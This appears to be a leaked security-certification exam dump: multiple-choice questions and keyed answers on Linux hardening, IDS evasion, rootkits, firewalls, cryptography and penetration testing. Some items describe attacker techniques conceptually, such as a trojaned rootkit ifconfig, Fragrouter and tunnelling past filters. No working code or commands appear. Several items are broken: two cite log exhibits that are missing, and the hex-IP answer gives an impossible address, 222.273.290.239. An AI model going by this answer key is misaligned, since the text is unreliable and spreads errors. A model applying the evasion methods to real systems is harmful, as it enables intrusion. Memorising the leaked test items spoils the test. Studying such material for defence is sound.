Joe the Hacker breaks into pass4sure's Linux system and plants a wiretap program in order to
sniff passwords and user accounts off the wire. The wiretap program is embedded as a Trojan
horse in one of the network utilities. Joe is worried that network administrator might detect the
wiretap program by querying the interfaces to see if they are running in promiscuous mode.
Running "ifconfig -a"will produce the following: #
ifconfig -a 1o0: flags=848 mtu 8232 inet 127.0.0.1
netmask ff000000hme0: flags=863 mtu 1500 inet
192.0.2.99 netmask ffffff00 broadcast 134.5.2.255
ether 8:0:20:9c:a2:35 What can Joe do to hide the wiretap program from being detected by ifconfigcommand?

A. Block output to the console whenever the user runs ifconfig command by running screen
capture utiliyu
B. Run the wiretap program in stealth mode from being detected by the ifconfig command.
C. Replace original ifconfig utility with the rootkit version of ifconfig hiding Promiscuous information
being displayed on the console.
D. You cannot disable Promiscuous mode detection on Linux systems.
C. Replace the original iconfig utility with the rootkit version of ifconfig hiding Promiscuous information being displayed on the console.
You have just installed a new Linux file server at your office. This server is going to be used by
several individuals in the organization, and unauthorized personnel must not be able to modify any
data. What kind of program can you use to track changes to files on the server?
A. Network Based IDS (NIDS)
B. Personal Firewall
C. System Integrity Verifier (SIV)
D. Linux IP Chains
C. System Integrity Verifier (SIV)
Several of your co-workers are having a discussion over the etc/passwd file. They are at odds
over what types of encryption are used to secure Linux passwords. (Choose all that apply.
A. Linux passwords can be encrypted with MD5
B. Linux passwords can be encrypted with SHA
C. Linux passwords can be encrypted with DES
D. Linux passwords can be encrypted with Blowfish
E. Linux passwords are encrypted with asymmetric algrothims
A. MD5
C. DES
D. Blowfish
Rebecca has noted multiple entries in her logs about users attempting to connect on ports that are
either not opened or ports that are not for public usage. How can she restrict this type of abuse by
limiting access to only specific IP addresses that are trusted by using one of the built-in Linux
Operating System tools?
A. Ensure all files have at least a 755 or more restrictive permissions.
B. Configure rules using ipchains.
C. Configure and enable portsentry on his server.
D. Install an intrusion detection system on her computer such as Snort
B. Configure rules using ipchains
John is discussing security with Jane. Jane had mentioned to John earlier that she suspects a Loadable Kernel Module has been installed on her server. She believes this is the reason that the server has been acting erratically lately. What does this mean in the context of Linux Security?
A. Loadable Kernel Modules are a mechanism for adding functionality to a file system without requiring a kernel recompilation.
B. Loadable Kernel Modules are a mechanism for adding functionality to an operating-system kernel after it has been recompiled and the system rebooted.
C. Loadable Kernel Modules are a mechanism for adding auditing to an operating-system kernel without requiring a kernel recompilation.
D. Loadable Kernel Modules are a mechanism for adding functionality to an operating-system kernel without requiring a kernel recompilation
D. Loadable Kernel Modules are a mechanism for adding functionality to an operating-system kernel without requiring a kernel recompilation
After studying the following log entries, what is the attacker ultimately trying to achieve as inferred from the log sequence?

A. Change password of user nobody
B. Extract information from a local directory
C. Change the files Modification Access Creation times
D. Download rootkits and passwords into a new directory
C. Change the files Modification Acces Creation times
Peter is a Linux network admin. As a knowledgeable security consultant, he turns to you to look for
help on a firewall. He wants to use Linux as his firewall and use the latest freely available version
that is offered. What do you recommend? Select the best answer.
A. Ipchains
B. Iptables
C. Checkpoint FW for Linux
D. Ipfwadm
B. Iptables
Exhibit Study the log given in the exhibit, Precautionary measures to prevent this attack would
include writing firewall rules. Of these firewall rules, which among the following would be
appropriate?

A. Disallow UDP 53 in from outside to DNS server
B. Allow UDP 53 in from DNS server to outside
C. Disallow TCP 53 in form secondaries or ISP server to DNS server
D. Block all UDP traffic
B. Allow UDP 53 in from DNS server to outside.
Which one of the following attacks will pass through a network layer intrusion detection system
undetected?
A. A teardrop attack
B. A SYN flood attack
C. A DNS spoofing attack
D. A test.cgi attack
D. A test.cgi attack
What makes web application vulnerabilities so aggravating? (Choose two)
A. They can be launched through an authorized port.
B. A firewall will not stop them.
C. They exist only on the Linux platform.
D. They are detectable by most leading antivirus software.
A. They can be launched through an authorized port
B. A firewall will not stop them.
Carl has successfully compromised a web server from behind a firewall by exploiting a
vulnerability in the web server program. He wants to proceed by installing a backdoor program.
However, he is aware that not all inbound ports on the firewall are in the open state. From the list
given below, identify the port that is most likely to be open and allowed to reach the server that Carl has just compromised.

A. 53
B. 110
C. 25
D. 69
A. 53
Neil monitors his firewall rules and log files closely on a regular basis. Some of the users have
complained to Neil that there are a few employees who are visiting offensive web sites during work
hours, without consideration for others. Neil knows that he has an updated content filtering system and that such access should not be authorized. What type of technique might be used by these offenders to access the Internet without restriction?

A. They are using UDP which is always authorized at the firewall.
B. They are using tunneling software which allows them to communicate with protocols in a way it was not intended.
C. They have been able to compromise the firewall, modify the rules, and give themselves proper access.
D. They are using an older version of Internet Explorer that allows them to bypass the proxy server.
B. They are using tunneling software which allows them to communicate with protocols in a way it was not intended.
Bob, an Administrator at pass4sure was furious when he discovered that his buddy Trent, has launched a session hijack attack against his network, and sniffed on his communication, including
administrative tasks such as configuring routers, firewalls, IDS, via Telnet. Bob, being an unhappy administrator, seeks your help to assist him in ensuring that attackers such as Trent will not be able to launch a session hijack in pass4sure. Based on the above scenario, please choose which would be your corrective measurement actions (Choose two)

A. Use encrypted protocols, like those found in the OpenSSH suite.
B. Implement FAT32 filesystem for faster indexing and improved performance.
C. Configure the appropriate spoof rules on gateways (internal and external).
D. Monitor for CRP caches, by using IDS products.
A. Use encrypted protocols, like those found in the OpenSSH suite.

C. Configure the appropriate spoof rules on gateways (internal and external).
Network Intrusion Detection systems can monitor traffic in real time on networks. Which one of the
following techniques can be very effective at avoiding proper detection?
A. Fragmentation of packets.
B. Use of only TCP based protocols.
C. Use of only UDP based protocols.
D. Use of fragmented ICMP traffic only.
A. Fragmentation of packets
While examining a log report you find out that an intrusion has been attempted by a machine
whose IP address is displayed as 0xde.0xad.0xbe.0xef. It looks to you like a hexadecimal number.
You perform a ping 0xde.0xad.0xbe.0xef. Which of the following IP addresses will respond to the
ping and hence will likely be responsible for the the intrusion?
A. 192.10.25.9
B. 10.0.3.4
C. 203.20.4.5
D. 222.273.290.239
D. 222.273.290.239
All the web servers in the DMZ respond to ACK scan on port 80. Why is this happening?
A. They are all Windows based webserver
B. They are allUnix based webserver
C. The company is not using IDS
D. The company is not using a stateful firewall
D. The company is not using a stateful firewall.
What is a sheepdip?
A. It is another name for Honeynet
B. It is a machine used to coordinate honeynets
C. It is the process of checking physical media for virus before they are used in a computer
D. None of the above
C. It is the process of checking physical media for virus before they are used in a computer
If you come across a sheepdip machine at your client's site, what should you do?
A. A sheepdip computer is used only for virus-checking.
B. A sheepdip computer is another name for a honeypot
C. A sheepdip coordinates several honeypots.
D. A sheepdip computers defers a denial of service attack.
A. A sheepdip computer is used only for virus-checking.
What type of attack changes its signature and/or payload to avoid detection by antivirus
programs?
A. Polymorphic
B. Rootkit
C. Boot sector
D. File infecting
A. Polymorphic
You may be able to identify the IP addresses and machine names for the firewall, and the names of internal mail servers by:
A. Sending a mail message to a valid address on the target network, and examining the header information generated by the IMAP servers
B. Examining the SMTP header information generated by using the -mx command parameter of DIG
C. Examining the SMTP header information generated in response to an e-mail message sent to
an invalid address
D. Sending a mail message to an invalid address on the target network, and examining the header information generated by the POP servers
C. Examining the SMTP header information generated in response to an e-mail message sent to
an invalid address
Which of the following is not an effective countermeasure against replay attacks?
A. Digital signatures
B. Time Stamps
C. System identification
D. Sequence numbers
C. System identification
To scan a host downstream from a security gateway, Firewalking:
A. Sends a UDP-based packet that it knows will be blocked by the firewall to determine how specifically the firewall responds to such packets
B. Uses the TTL function to send packets with a TTL value set toexpire one hop past the identified security gateway
C. Sends an ICMP ''administratively prohibited'' packet to determine if the gateway will drop the packet without comment.
D. Assesses the security rules that relate to the target system before it sends packets to any hops
on the route to the gateway
B. Uses the TTL function to send packets with a TTL value set to expire one hop past the identified security gateway.
Which of the following are potential attacks on cryptography? (Select 3)
A. One-Time-Pad Attack
B. Chosen-Ciphertext Attack
C. Man-in-the-Middle Attack
D. Known-Ciphertext Attack
E. Replay Attack
B. Chosen Ciphertext Attack
C. Man in the Middle Attack
E. Replay Attack
What is a primary advantage a hacker gains by using encryption or programs such as Loki?
A. It allows an easy way to gain administrator rights
B. It is effective against Windows computers
C. It slows down the effective responseof an IDS
D. IDS systems are unable to decrypt it
E. Traffic will not be modified in transit
D. IDS systems are unable to decrypt it.
Which of the following countermeasure can specifically protect against both the MAC Flood and
MAC Spoofing attacks?
A. Port Security
B. Switch Mapping
C. Port Reconfiguring
D. Multiple Recognition
A. Port Security
There are two types of honeypots- high and low interaction. Which of these describes a low
interaction honeypot? Select the best answers.
A. Emulators of vulnerable programs
B. More likely to be penetrated
C. Easier to deploy and maintain
D. Tend to be used for production
E. More detectable
F. Tend to be used for research
A. Emulators of vulnerable programs
C. Easier to deploy and maintain
D. Tend to be used for production
E. More detectable
An Evil Cracker is attempting to penetrate your private network security. To do this, he must not be
seen by your IDS, as it may take action to stop him. What tool might he use to bypass the IDS?
Select the best answer.
A. Firewalk
B. Manhunt
C. Fragrouter
D. Fragids
C. Fragrouter
The programmers on your team are analyzing the free, open source software being used to run
FTP services on a server. They notice that there is an excessive number of fgets() and gets() on
the source code. These C++ functions do not check bounds. What kind of attack is this program
susceptible to?
A. Buffer of Overflow
B. Denial of Service
C. Shatter Attack
D. Password Attack
A. Buffer Overflow
Symmetric encryption algorithms are known to be fast but present great challenges on the key
management side. Asymmetric encryption algorithms are slow but allow communication with a
remote host without having to transfer a key out of band or in person. If we combine the strength
of both crypto systems where we use the symmetric algorithm to encrypt the bulk of the data and
then use the asymmetric encryption system to encrypt the symmetric key, what would this type of
usage be known as?

A. Symmetric system
B. Combined system
C. Hybrid system
D. Asymmetric system
C. Hybrid system
In the context of using PKI, when Sven wishes to send a secret message to Bob, he looks up
Bob's public key in a directory, uses it to encrypt the message before sending it off. Bob then uses
his private key to decrypt the message and reads it. No one listening on can decrypt the message.
Anyone can send an encrypted message to Bob but only Bob can read it. Thus, although many
people may know Bob's public key and use it to verify
Bob's signature, they cannot discover Bob's private key and use it to forge digital signatures. What
does this principle refer to?
A. Irreversibility
B. Non-repudiation
C. Symmetry
D. Asymmetry
D. Asymmetry
Which of the following is NOT true of cryptography?
A. Science of protecting information by encoding it into an unreadable format
B. Method of storing and transmitting data in a form that only those it is intended for can read and
process
C. Most (if not all) algorithms can be broken by both technical and non-technical means
D. An effective way of protecting sensitive information in storage but not in transit
D. An effective way of protecting sensitive information in storage but not in transit
Which of the following best describes session key creation in SSL?
A. It is created by the server after verifying theuser's identity
B. It is created by the server upon connection by the client
C. It is created by the client from the server's public key
D. It is created by the client after verifying the server's identity
D. It is created by the client after verifying the server's identity
_____ is a type of symmetric-key encryption algorithm that transforms a fixed-length block of
plaintext (unencrypted text) data into a block of ciphertext (encrypted text) data of the same length.
A. Bit Cipher
B. Hash Cipher
C. Block Cipher
D. Stream Cipher
C. Block Cipher
There is some dispute between two network administrators at your company. Your boss asks you
to come and meet with the administrators to set the record straight. Which of these are true about
PKI and encryption? Select the best answers.
A. PKI provides data with encryption, compression, and restorability.
B. Public-key encryption was invented in 1976 by Whitfield Diffie and Martin Hellman.
C. When it comes to eCommerce, as long as you have authenticity, and authenticity, you do not
need encryption.
D. RSA is a type of encryption
B. Public Key Encryption was invented in 1976 by Diffie and Hellman

D. RSA is a type of encryption
Joel and her team have been going through tons of garbage, recycled paper, and other rubbish in
order to find some information about the target they are attempting to penetrate. What would you
call this kind of activity?
A. CI Gathering
B. Scanning
C. Dumpster Diving
D. Garbage Scooping
C. Dumpster Diving
A client has approached you with a penetration test requirements. They are concerned with the
possibility of external threat, and have invested considerable resources in protecting their Internet
exposure. However, their main concern is the possibility of an employee elevating his/her
privileges and gaining access to information outside of their respective department. What kind of
penetration test would you recommend that would best address the client's concern?
A. A Black Box test
B. A Black Hat test
C. A Grey Box test
D. A Grey Hat test
E. A White Box test
F. A White Hat test
C. A Grey Box Test
In which of the following should be performed first in any penetration test?
A. System identification
B. Intrusion Detection System testing
C. Passive information gathering
D. Firewall testing
C. Passive Information Gathering.